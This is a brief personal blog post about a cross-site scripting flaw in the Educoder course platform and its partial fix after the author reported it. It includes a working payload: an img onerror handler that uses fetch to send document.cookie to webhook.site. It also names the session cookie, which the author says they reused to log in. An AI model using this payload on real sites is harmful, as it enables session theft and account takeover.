September 9, 2024

Problematic Course Platform

Regarding the Educoder platform mentioned before: it is very problematic.

It doesn't have any CSP policy, you can input markdown into it, and I discovered this when it rendered images in my markdown directly from my CDN.

Basically it has a markdown editor on one side and the rendered HTML on the other, but it fails to sanitize the input. Also the cookie isn't HttpOnly, so if I input

<img src="invalid" onerror="fetch('https://webhook.site/...'+document.cookie)">

it will successfully send the person's cookie to the malicious site. There is only one cookie, called _educoder__session, so I literally logged in.

The point is the school's platform is very shitty and lacks all security measures, and I could theoretically hijack the TA's cookie and log in easily, although I would never do that because of the consequences.

Anyway, I told the TA privately about this. This is a class platform, and I had no idea whom to contact.

Then I opened an issue, and after 3 days the school fixed it, but only partially, by using HttpOnly cookies and adding a CSP policy, so you can't steal the cookies anymore. But JavaScript can still execute, which leaves a lot of vulnerability, though it is more noticeable to TAs and harder for attackers to succeed.

Anyway, I quit the course later, after the mid-term. So it's very, very sad.
